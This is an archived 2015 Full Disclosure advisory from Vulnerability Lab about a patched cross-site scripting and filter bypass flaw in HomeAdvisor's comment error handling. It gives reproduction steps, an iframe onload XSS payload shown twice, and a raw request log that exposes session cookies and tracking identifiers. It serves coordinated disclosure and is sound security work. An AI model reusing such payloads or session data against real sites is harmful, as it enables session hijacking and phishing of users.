[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] HomeAdvisor Bug Bounty #1 - Filter Bypass & Client Side Exception Handling Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] HomeAdvisor Bug Bounty #1 - Filter Bypass & Client Side Exception Handling Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Wed, 22 Apr 2015 13:40:56 +0200
Document Title:
===============
HomeAdvisor (Bug Bounty #1) - Filter Bypass & Client Side Exception Handling
Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1452
Release Date:
=============
2015-04-21
Vulnerability Laboratory ID (VL-ID):
====================================
1452
Common Vulnerability Scoring System:
====================================
3.6
Product & Service Introduction:
===============================
HomeAdvisor is a website that lists pre-screened and customer-rated service
professionals. The website also has tools, products, and resources
for home improvement, maintenance, and repair. HomeAdvisor is a subsidiary of
IAC. Professionals in the HomeAdvisor network are pre-screened for
criminal records, bankruptcy issues, bad reviews, sex offenses, and cases of
malpractice. Homeowners choose a category that matches their home
improvement needs, enter their full address or adjacent cross-streets and
contact information and answer three pages of questions about their project.
(Copy of the Homepage: http://en.wikipedia.org/wiki/HomeAdvisor )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a filter bypass and
issue and client-side cross site scripting web vulnerability in the official
homeadvisor web-application.
Vulnerability Disclosure Timeline:
==================================
2015-03-10: Researcher Notification & Coordination (Benjamin Kunz Mejri -
Evolution Security GmbH)
2015-03-11: Vendor Notification (HomeAdvisor Inc - Security Research Team)
2015-03-26: Vendor Response/Feedback (HomeAdvisor Inc - Security Research Team)
2015-04-20: Vendor Fix/Patch (HomeAdvisor Inc - Developer Team)
2015-04-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
HomeAdvisor Inc
Product: HomeAdvisor - Web Application (Online Service) 2015 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A non-persistent cross site scripting web vulnerability (client-side) and
filter bypass issue has been discovered in the official HomeAdvisor
web-application.
The security vulnerability allows remote attackers to execute client-side
script code that compromises the homeadvisor web-application.
The client-side cross site scripting web vulnerability is located in the
exception-handling comments context. Remote attackers are able to inject
client-side
script code that executes in the web-application exception-handling. The
request method to execute is GET and the attack vector is client-side. Remote
attackers
are able to prepare special crafted urls with own script codes to compromise
homeadvisor user session data in connection with client-side attacks.
The security risk of the client-side cross site scripting web vulnerability is
estimated as medium with a cvss (common vulnerability scoring system) count of
3.6.
Exploitation of the non-persistent web vulnerability requires a low privileged
web-application user account and low or medium user interaction. Successful
exploitation of
the vulnerabilities result in persistent phishing, session hijacking,
persistent external redirect to malicious sources and application-side
manipulation of affected or
connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] rated.VipElectric.11975047.html#profile
Affected Parameter(s):
[+] sm/security/login/isLoggedInOrRecognized
Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability and filter bypass issue can
be exploited by remote attackers without privileged application user account
and with low or medium user interaction. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below to
continue.
Manual steps to reproduce the vulnerability ...
1. Login to the service
2. Surf to for example
(http://www.homeadvisor.com/rated.VipElectric.11975047.html#profile)
3. Inject splitted char payload to the input of the comments
4. Send the comment
5. An exception occurs with an error (An error has occurred, please try again
later (400124)
6. Under the exception is the injected code
7. Now click to embed the stuff or use the share function
8. Successful reproduce of the vulnerability!
PoC: Payload(s)
</> %20%20%20"><iframe src=http://www.vulnerability-lab.com onload=("PTEST") <
--- PoC Session Logs [GET] (Execution) ---
1:10:13.175[555ms][total 555ms]
Status: 200[OK]
GET http://www.homeadvisor.com/sm/security/login/isLoggedInOrRecognized
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.homeadvisor.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101
Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://www.homeadvisor.com/rated.VipElectric.11975047.html]
Cookie[JSESSIONID=89CA35A29518C918753732BBA0A2619B.pwspr013-1;
aff_track=2|*|23116563|*|0;
sess_log=1426029961910pwspr01389CA35A29518C918753732BBA0A2619B.pwspr013-1;
X-ha-bd-sess=1425986520:56461266;
TS01430915=0109d29b8d179b434e41360538aabe44a1c76797febed11d293ea886b69c3de8bc1aa4d2853c2b3e3d4418ce9be034a42e46fc0ccb4e9e86dbbaaa903c4d5b347aaa340c177cc59a98648ac06086412168e42446ebd3a49b6712a2fbac5
e643d80fda0a0524c6f1ba864d1cfd81dd998aa466fd2d60a7288722d26db977320ff2495e511ca3e770ffaf1c822be2f478437e77cf2a2b054baebfda9be1b1384a378d0bbb4e9817c503d1b414a8287a80c8220d506f5f12622b0a1ea3626deb8a51
3594daefa;
TS01a79be6=0109d29b8d5240c384919b5178f3277a1cfed624571201fc13952382841740935543b8faaf7d22a0ff91c3b61475f2e8410067cc1f82284d22f6f696422d11ed8b0cf28c2ce60e8cd3ee9216ce445edb2987ce56a7779feda039288b3e
17e61b409e71572c0b74d600efcf5c081f7291e95fac3aaa9258a72df1878c81eeca8325e66b9672b9b97cf33637d14041b4e1f7b1994210c09dc9b6f5a1455191e2998b4a8772e176f509335d3968af0f416b6a9d04b3fe;
s_cc=true;
s_fid=610258AEEAC3DF17-00A2F1CF9416C7D2; s_eVar8=consumer;
c_m=undefinedType-InType-In; s_e69=Type-In;
v71=%5B%5B%27Type-In%27%2C%271425986515454%27%5D%2C%5B%27Internal%27%2C%271425993558198%27%5D%2C%5B%27Type-In%27%2C%271425993618602%27%5D%2C%5B%27Internal%27%2C%271425995800972%27%5D%2C%5B%27
Type-In%27%2C%271426014538662%27%5D%2C%5B%27Internal%27%2C%271426017442804%27%5D%2C%5B%27Type-In%27%2C%271426030375147%27%5D%5D;
s_evar46=6%3A00PM; s_evar47=Tuesday; s_evar48=Weekday;
s_dslv2=1426032535680; s_gnr=1426032535681-Repeat; s_gnr2=Repeat;
s_vnum=1427839200456%26vn%3D8; s_visNum=8; s_ppv=10; v11=84.185.13.226;
s_sq=smagic-smprod%3D%2526pid%253DXM%252520SP%252520
Profile%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.homeadvisor.com%25252Fjavascrip%252525C2%252525ADt%25253Adocument.cook%252525C2%252525ADie%25253Dtrue%25253B%25252F%25252F%252523%2526ot%253DA;
fsr.s=%7B%22cp%22%3A%7B%22userID%22%3A%2246040820%22%2C%22sessionID%22%3A%221426029961910pwspr01389CA35A29518C918753732BBA0A2619B.pwspr013-1%22%2C%22categoryID%22%3A%22-12003%22%2C%22entryPage%22%3A%22%2F
cost%2F%22%2C%22zipCode%22%3A%22%22%2C%22affiliateID%22%3A%2223116563%22%2C%22loggedIn%22%3A%22false%22%2C%22ActionName%22%3A%22%20
CostGuide_Mobile_10_2014_SITE-3032_mobile%2C%20FollowU_Zip_July2014_SITE3493_Zip%2C%20MM_SR_Path_Redesign_8_2014_SITE-3022_New%22%2C%22
proAccepts%22%3A%220%22%2C%22matchType%22%3A%221%22%2C%22backstopPros%22%3A%220%22%2C%22srOID%22%3A%2262243775%22%7D%2C%22v2%22%3A1%2C%22v1%22%3A1%2C%22mid%22%3A%22d036702-53516078-bdc2-f14c-
58e6b%22%2C%22rt%22%3Afalse%2C%22rc%22%3Atrue%2C%22rid%22%3A%22d036702-53517934-beee-c673-616a7%22%2C%22to%22%3A4.5%2C%22c%22%3A%22http%3A%2F%2Fwww.homeadvisor.com%2Fservlet%2FContentCommentServlet
%22%2C%22pv%22%3A188%2C%22lc%22%3A%7B%22d1%22%3A%7B%22v%22%3A182%2C%22s%22%3Atrue%2C%22e%22%3A5%7D%7D%2C%22cd%22%3A1%2C%22f%22%3A1426031413593%2C%22sd%22%3A1%2C%22l%22%3A%22en%22%2C%22i%22%3A-1%7D;
optimizelySegments=%7B%22192702441%22%3A%22ff%22%2C%22192663147%22%3A%22false%22%2C%22192690192%22%3A%22none%22%2C%22192644497%22%3A%22direct%22%2C%222403180023%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1425986515515r0.36085588611318686;
optimizelyBuckets=%7B%222509000457%22%3A%222563320274%22%2C%222601010276%22%3A%222601800266%22%2C%222623890407%22%3A%222647140222%22%7D;
__utma=65920055.115194839.1425986516.1426017443.1426029956.8; __utmc=65920055;
__utmz=65920055.1425986516.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
s_vi=[CS]v1|2A7F69ED05309508-40000301600EFE2F[CE];
__ar_v4=CQGP6W2UOJGBFCANPRKR5H%3A20150309%3A5%7CIDYAPENI5FCGPGA2NLXVJ5%3A20150309%3A1%7C2LYJLG4RLJCKZCOW7TRWTE%3A20150309%3A157%7C4SFWD66ESVAFDCGDKRX43R%3A20150309%3A188%7COBIU2LI5ZFELBJFDGHFF5S
%3A20150309%3A188%7CYKBDSWI7CVFBROZXQAPFMB%3A20150309%3A14%7CLC3U2GKD5VF63JGOPX6HT2%3A20150309%3A11;
TS01527d1a=0109d29b8d060f45e2e967a61f04582c6c2bfc582baea68c62234fa8606172257738cde47c5404771784301981267f77be284b4e77256c3122d99f8a660d03cc64406c4faaa10d7de3213d047ef255db8f1f12bd1f4697db8
ca02dbb0d79bdd0151355e51089499fa949916329943e1a19ff53fab2; s_e4=event4;
s_eVar55=46040820;
__gads=ID=357daba345c2b8c0:T=1425986677:S=ALNI_MYyhje-vimsjWs8tJf_Qiae1cpHUg;
fsr.r=%7B%22d%22%3A90%2C%22i%22%3A%22d036702-53517934-beee-c673-616a7%22%2C%22e%22%3A1426591573816%7D;
__qca=P0-1277497560-1425988321274; s_usr=62243775; s_sm_st=23132;
s_sm_c43=0; s_xmdct=0; keyCode=46040820_v30b615ec2e400ae11809849a05c1542cf;
psacn=746971; csdcn=1426029961910;
originatingSessionID=1426002115185pwspr00876A620929206B7212CE306A3E369D614;
psdcn=1426017448504; csacn=746971; ServerID=218736832.20480.0000; fpv=1;
s_dslv2_s=Less%20than%201%20day; s_invisit=true;
__utmb=65920055.34.10.1426029956;
glt_3_Wd_kQ4DJvIfvFBwN5u4vNdB_Rs4wdW8_OmExAoOq35NyVPyKy9RMvQBIPpT0YoDM=LT3_Ocj0qTvw9LW02XcAJQubDhVJ5PPbV-JsJzS_cp9Lyps%7CUUID%3Dbd47502754b04a68905a7c4e0ccba02b;
_gig_email=admin%40evolution-sec.com; __utmt=1]
Connection[keep-alive]
Response Header:
Date[Wed, 11 Mar 2015 00:10:20 GMT]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[application/json;charset=UTF-8]
Set-Cookie[ServerID=218736832.20480.0000; expires=Wed, 11-Mar-2015 00:35:20
GMT; path=/
TS01430915=0109d29b8d179b434e41360538aabe44a1c76797febed11d293ea886b69c3de8bc1aa4d2853c2b3e3d4418ce9be034a42e46fc0ccb4e9e86dbbaaa903c4d5b347aaa340c177cc59a98648ac06086412168e42446eb
d3a49b6712a2fbac5e643d80fda0a0524c6f1ba864d1cfd81dd998aa466fd2d60a7288722d26db977320ff2495e511ca3e770ffaf1c822be2f478437e77cf2a2b054baebfda9be1b1384a378d0bbb4e9817c503d1b414a8287
a80c8220d506f5f12622b0a1ea3626deb8a513594daefa; Path=/]
Transfer-Encoding[chunked]
Reference(s):
http://www.homeadvisor.com/rated.VipElectric.11975047.html
http://www.homeadvisor.com/sm/security/login/isLoggedInOrRecognized
Solution - Fix & Patch:
=======================
The issue can be patched by a secure parse and encode of the exception output
message after the input through the html file.
Restrict the input and disallow special chars or use a secure exception to
prevent injection attacks.
Payload: </> %20%20%20``><iframe src=http://www.vulnerability-lab.com
onload=(``PTEST``) <
Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the
exception and filter bypass issue are estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2015 | Vulnerability Laboratory -
[Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY:
http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/